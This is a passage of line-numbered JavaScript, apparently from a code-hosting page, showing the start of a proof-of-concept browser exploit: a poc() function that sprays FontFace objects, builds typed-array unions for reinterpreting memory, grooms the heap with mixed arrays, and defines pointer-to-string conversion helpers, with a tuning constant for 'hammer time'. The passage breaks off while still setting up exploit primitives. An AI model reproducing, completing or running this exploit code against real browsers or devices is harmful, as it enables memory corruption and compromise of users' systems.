()
| 10 | var HAMMER_NSTRINGS = 700; //tweak this if crashing during hammer time |
| 11 | |
| 12 | function poc(){ |
| 13 | |
| 14 | function hex(n) |
| 15 | { |
| 16 | if((typeof n) != "number") |
| 17 | return ""+n; |
| 18 | return "0x" + (new Number(n)).toString(16); |
| 19 | } |
| 20 | |
| 21 | var union = new ArrayBuffer(8); |
| 22 | var union_b = new Uint8Array(union); |
| 23 | var union_i = new Uint32Array(union); |
| 24 | var union_f = new Float64Array(union); |
| 25 | |
| 26 | var bad_fonts = []; |
| 27 | |
| 28 | for(var i = 0; i < SPRAY_FONTS; i++) |
| 29 | bad_fonts.push(new FontFace("font1", "", {})); |
| 30 | |
| 31 | var good_font = new FontFace("font2", "url(data:text/html,)", {}); |
| 32 | bad_fonts.push(good_font); |
| 33 | |
| 34 | var arrays = []; |
| 35 | for(var i = 0; i < 512; i++) |
| 36 | arrays.push(new Array(31)); |
| 37 | |
| 38 | arrays[256][0] = 1.5; |
| 39 | arrays[257][0] = {}; |
| 40 | arrays[258][0] = 1.5; |
| 41 | |
| 42 | var jsvalue = {a: arrays[256], b: new Uint32Array(1), c: true}; |
| 43 | |
| 44 | var string_atomifier = {}; |
| 45 | var string_id = 10000000; |
| 46 | |
| 47 | function ptrToString(p) |
| 48 | { |
| 49 | var s = ''; |
| 50 | for(var i = 0; i < 8; i++) |
| 51 | { |
| 52 | s += String.fromCharCode(p % 256); |
| 53 | p = (p - p % 256) / 256; |
| 54 | } |
| 55 | return s; |
| 56 | } |
| 57 | |
| 58 | function stringToPtr(p, o) |
| 59 | { |
| 60 | if(o === undefined) |
| 61 | o = 0; |
| 62 | var ans = 0; |
| 63 | for(var i = 7; i >= 0; i--) |
| 64 | ans = 256 * ans + p.charCodeAt(o+i); |
| 65 | return ans; |
| 66 | } |
| 67 | |
| 68 | var strings = []; |
| 69 |
no test coverage detected